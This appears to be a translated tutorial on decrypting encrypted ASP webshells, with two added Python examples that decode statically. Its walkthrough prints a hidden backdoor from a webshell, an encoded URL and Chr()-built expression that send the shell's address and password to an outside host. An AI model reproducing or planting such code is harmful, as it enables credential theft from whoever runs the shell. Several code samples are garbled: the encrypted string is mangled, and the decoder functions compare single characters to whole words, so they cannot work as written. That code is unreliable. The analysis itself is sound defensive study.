Jindao Ke
The first time I came across encrypted ASP files, I was fascinated by the garbled characters and hoped to find the recipe for decrypting them, so I began exploring ASP file decryption. After a period of exploration and research, I have a certain understanding of ASP file encryption and decryption. I wrote this article as a summary of what I learned during this period and to share that experience with you. WEBSHELL Decoder & Encoder is also a result of this period.
To understand ASP file decryption, you must first understand how ASP files run; without that, you cannot decrypt them. Common technologies for interactive dynamic web pages currently include CGI, ASP, JSP, PHP, and .NET. ASP provides a framework for using script files in HTML. The common scripting languages are Microsoft VBScript and Microsoft JScript, and most ASP files use VBScript. ASP is an interpreted language: statements are interpreted and executed one by one, in sequence, and the interpreter must be given complete, correct plaintext code before it can execute anything. This inherent limitation means that ASP encryption is always completely reversible. Some friends have asked me how to implement irreversible ASP encryption. I think this is impossible; it is determined by the nature of the language. Some may ask: isn't VBScript.Encode irreversible? It is similar to any other custom encryption function, except that the decryption function is not included in the ASP file but built into asp.dll. As soon as LANGUAGE = VBScript.Encode is detected in the ASP file, the decryption function is called, and the result is then executed line by line. Preventing decryption would require Microsoft to rewrite VBScript.Encode.
I believe the first difficulty many friends encounter when decrypting ASP files is VBScript.Encode encryption. Microsoft's encoding has been completely broken, and many websites offer online VBScript.Encode decoding. Note that when the ASP file contains special characters such as "X", the program will exit. This is an error caused by encoding; you only need to replace the special character with another character to continue decryption.
After VBScript.Encode is decoded, only the first shell of the file has been stripped; the data underneath is encrypted by user-defined functions.
Executing ASP files requires a script environment: the server executes the script code in the ASP file. For Microsoft users this environment is IIS, so decrypting from within the running environment is one direction. Its characteristic is that IIS must be set up to run the ASP file in order to decrypt it. The other direction is to decrypt from the perspective of the script itself; this does not need an IIS environment, and the file is decrypted directly.
First, decryption in the IIS environment. You must of course first set up IIS on the system. Because this kind of encryption has to be decrypted by the decryption function and then run through ExeCuTe, replacing the execution with an output function yields the plaintext. I will introduce three methods.
The first method, my favorite, is the FSO method.
ShiSan = "~ Latency> ELBAT/<effecetirw. esnopseR ~ Latency> RT/<effecetirw. esnopseR ~ Latency> DT/<effecetirw. esnopseR ~ Fi dnE ~ Too many etirW. esnopseR ~ Response> response timeout;) 1-(og. yrotsih response timeout = kcilCno return = eulav nottub = epyt TUPNI <effecetirw. esnopseR ~ EslE ~ Too many etirW. esnopseR ~ Authorization> commandid;) (esolc. wodniw commandid = kcilcno = eulav nottub = epyt TUPN ": ExeCuTe (UZSS (ShiSan ))
In this code, the value of ShiSan is the encrypted string and UZSS is the decryption function, so we can add the following statements after ExeCuTe(UZSS(ShiSan)):
Program code
' Write the decrypted text to OK.asp next to the encrypted file
Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set outpout = fs.CreateTextFile(Server.MapPath("OK.asp"), True)
outpout.Write ShiSanFun(ShiSan)
outpout.Close
An OK.asp file containing the plaintext is generated in the same directory as the ASP file. This is how the FSO method obtains the source code.
The second method works the same way, but the code is different. This procedure is written at the top of the file.
Program code
' Write strContent to strFile: append when blnAppend is True, otherwise overwrite
Sub Write2File(strFile, strContent, blnAppend)
    On Error Resume Next
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If blnAppend Then
        Set objWriteText = objFSO.OpenTextFile(strFile, 8, True) ' 8 = ForAppending
    Else
        Set objWriteText = objFSO.OpenTextFile(strFile, 2, True) ' 2 = ForWriting
    End If
    objWriteText.WriteLine strContent
    objWriteText.Close
    Set objWriteText = Nothing
    Set objFSO = Nothing
    Select Case Err.Number
        Case 0 ' success, nothing to report
        Case 424
            Response.Write "The path is not found or the directory has no Write permission."
        Case Else
            Response.Write Err.Number
    End Select
End Sub
Then you only need to add the following at the location to be decrypted:
Write2File "M:\encryption and decryption\test1.txt", ShiSanFun(ShiSan), True
The advantage of this method is that it is a reusable function and can be called multiple times.
The third method outputs the text directly using the Server.HTMLEncode method. The code is as follows:
Program code
' Print the decrypted text in the browser, HTML-escaped so it is displayed rather than rendered
Function Outpoutstr(objstring)
    Response.Write("<pre>" & Server.HTMLEncode(objstring) & "</pre>")
End Function
Then change ExeCuTe(UZSS(ShiSan)) to Outpoutstr(ShiSanFun(ShiSan)), run the file, and the plaintext is output in the browser.
The methods above are the simplest and most effective when a file is encrypted as a whole and everything is decrypted and executed at the end. However, if there are dozens of encrypted ASP files, dozens of ExeCuTe calls need to be replaced, and restoring the plaintext becomes a huge task. It is easy to solve this problem from the perspective of the script itself. Based on this idea, I wrote the WEBSHELL Decoder & Encoder software. As we all know, VBScript syntax in ASP is the same as in VB, which means the decryption functions in an ASP file can be called directly from a VB program, saving the trouble of converting them. The following uses an animation of decrypting a specific instance, the Siliemor Shell.asp file, to describe the decryption of ASP files.
The following is an animation description:
We decrypt a specific instance, the Siliemor Shell.asp file, to describe the decryption of ASP files. Take a look at this file. Obviously, the first layer is VBScript.Encode.
Here we have taken off the first shell. Looking at the file, shellcode.asp has been completely decoded. We can see two decryption functions, so there are two encryptions.
Function ShiSanFun(ShiSanObjstr)
    ShiSanObjstr = Replace(ShiSanObjstr, "comment", """") ' put the double quotes back
    For ShiSanI = 1 To Len(ShiSanObjstr)
        If Mid(ShiSanObjstr, ShiSanI, 1) <> "token" Then
            ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr ' prepending reverses the string
        Else
            ShiSanNewStr = vbCrLf & ShiSanNewStr ' the separator becomes a line break
        End If
    Next
    ShiSanFun = ShiSanNewStr
End Function
Function UZSS(objstr)
    objstr = Replace(objstr, "delimiter", """") ' put the double quotes back
    For I = 1 To Len(objstr)
        If Mid(objstr, I, 1) <> "~" Then
            NewStr = Mid(objstr, I, 1) & NewStr ' prepending reverses the string
        Else
            NewStr = vbCrLf & NewStr ' "~" becomes a line break
        End If
    Next
    UZSS = NewStr
End Function
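Decrypting from the perspective of the script itself does not have to be done in VB. The following Python code is an added example, not the article's WEBSHELL Decoder & Encoder: it ports the reverse-and-split loop of the two functions above and decodes every Name = "...": ExeCuTe(Func(Name)) block in a file without running any of it. The sample file and the "^" and "|" characters are constructed assumptions; only the "~" separator comes from the page.

```python
import re

def reverse_decode(blob, line_sep, quote_standin):
    """Same transformation as the page's UZSS/ShiSanFun loop: restore the
    double quotes, reverse the string, turn each separator into CRLF."""
    blob = blob.replace(quote_standin, '"')
    return "".join("\r\n" if ch == line_sep else ch for ch in reversed(blob))

# Name = "<blob>": ExeCuTe(Func(Name))   (VBScript is case-insensitive)
PACKED = re.compile(
    r'(?P<var>\w+)\s*=\s*"(?P<blob>(?:[^"]|"")*)"\s*:\s*'
    r'execute\s*\(\s*(?P<func>\w+)\s*\(\s*(?P=var)\s*\)\s*\)',
    re.IGNORECASE)

def unpack_asp(source, decoders):
    """Statically decode every packed block; nothing from the file is run.
    decoders: lower-cased function name -> (line_sep, quote_standin).
    Returns (function name, plaintext or None) per block, in file order."""
    results = []
    for m in PACKED.finditer(source):
        func = m.group("func")
        params = decoders.get(func.lower())
        if params is None:
            results.append((func, None))           # unknown decoder: review by hand
            continue
        blob = m.group("blob").replace('""', '"')  # VBScript quote escape
        results.append((func, reverse_decode(blob, *params)))
    return results

# Constructed sample. "~" is the separator UZSS uses on the page; "^" and "|"
# are hypothetical stand-ins, because the page's own characters did not survive.
DECODERS = {"uzss": ("~", "^"), "shisanfun": ("|", "^")}
SAMPLE = '''<%
ShiSan = "dnE.esnopseR~^>b/<ko>b<^ etirW.esnopseR": ExeCuTe(UZSS(ShiSan))
Sb = "1 = x|2 = y": execute(ShiSanFun(Sb))
Zz = "abc": ExeCuTe(Other(Zz))
%>'''

if __name__ == "__main__":
    for func, text in unpack_asp(SAMPLE, DECODERS):
        print("==", func, "==")
        print(text if text is not None else "(decoder not known)")
```

A block whose decoder function is not listed comes back as None, so it can be reviewed by hand.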
First, let's look at the first encryption, the encryption of the 13th item. We can see that there are two items; save and decrypt, without modifying the parameters!
Now let's look at the second function. The form is the same, but the parameters and function name are slightly different. Set them. We can see that this function has a total of 44 encryption points; save the results.
Check whether the file has been decrypted. It has: everything is in plain text.
Now the shell is completely decrypted, so let's find the backdoor. Where xmlhttp appears, there may be a backdoor. Let's try it.
Obviously, this is the code that is executed after the correct password is entered. Let's run it.
See: Localhost/shellcode2.asp "> http://www.*******.cn/123/test.asp <chuandi> <mobile> localhost/shellcode2.asp-1 </mobile> </chuandi>
The backdoor has been completely exposed: all of our shell addresses and passwords are sent to test.asp.
Okay. Continue.
Here is another backdoor. Let's decrypt it.
Run the file again.
The backdoor address is out.
http://%38%63%63e%2E%63%6f%6d/%61%62/?%75=localhost/shellcode2.asp&p=1
You can find this address by yourself.
& Chr(37) & "38" & Chr(37) & "63%63" & Chr(101-pos) & "%2E" & Chr(37) & "63%6f" & Chr(37) & "6d/%" & (61+pos) & "%" & (62+pos) & "/?%75=" & Serveru & "&p=" & UserPass
Chr(37) is "%", and pos is 0 because no value is assigned, so this sentence can be
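
The folding described above can be done statically. This is an added Python example, not part of the original article: it evaluates the Chr()/& expression without running the shell, with pos taken as 0, and percent-decodes the result so the destination can be logged or blocked. The "http://" head is taken from the address shown above because the start of the expression is missing; the function names are hypothetical.

```python
import re
from urllib.parse import unquote

TOKEN = re.compile(r'''\s*(?:
      "(?P<lit>(?:[^"]|"")*)"            # "string literal"
    | chr\s*\(\s*(?P<chr>[^()]+?)\s*\)   # Chr(<sum>)
    | \(\s*(?P<num>[^()]+?)\s*\)         # (<sum>), converted to its digits
    | (?P<name>[A-Za-z_]\w*)             # variable
    )\s*(?:&|$)''', re.IGNORECASE | re.VERBOSE)

def arith(expr, env):
    """Evaluate a +/- sum of integers and known variables, nothing else."""
    total = 0
    for sign, term in re.findall(r'([+-]?)\s*(\w+)', expr):
        value = int(term) if term.isdigit() else int(env[term.lower()])
        total += -value if sign == "-" else value
    return total

def fold_concat(expr, env):
    """Return the string a '&' concatenation builds, without executing it."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError("unsupported token at offset %d" % pos)
        if m.group("lit") is not None:
            out.append(m.group("lit").replace('""', '"'))
        elif m.group("chr"):
            out.append(chr(arith(m.group("chr"), env)))
        elif m.group("num"):
            out.append(str(arith(m.group("num"), env)))
        else:
            out.append(str(env[m.group("name").lower()]))
        pos = m.end()
    return "".join(out)

def exfil_url(expr, env):
    """(address as the shell requests it, percent-decoded form for review)."""
    raw = fold_concat(expr, env)
    return raw, unquote(raw)

# Expression from the page; the "http://" head comes from the address shown
# above because the start of the expression is missing. pos is unassigned (0).
EXPR = ('"http://" & Chr(37) & "38" & Chr(37) & "63%63" & Chr(101-pos) & "%2E"'
        ' & Chr(37) & "63%6f" & Chr(37) & "6d/%" & (61+pos) & "%" & (62+pos)'
        ' & "/?%75=" & Serveru & "&p=" & UserPass')
ENV = {"pos": 0, "serveru": "localhost/shellcode2.asp", "userpass": "1"}
if __name__ == "__main__":
    print(*exfil_url(EXPR, ENV), sep="\n")
```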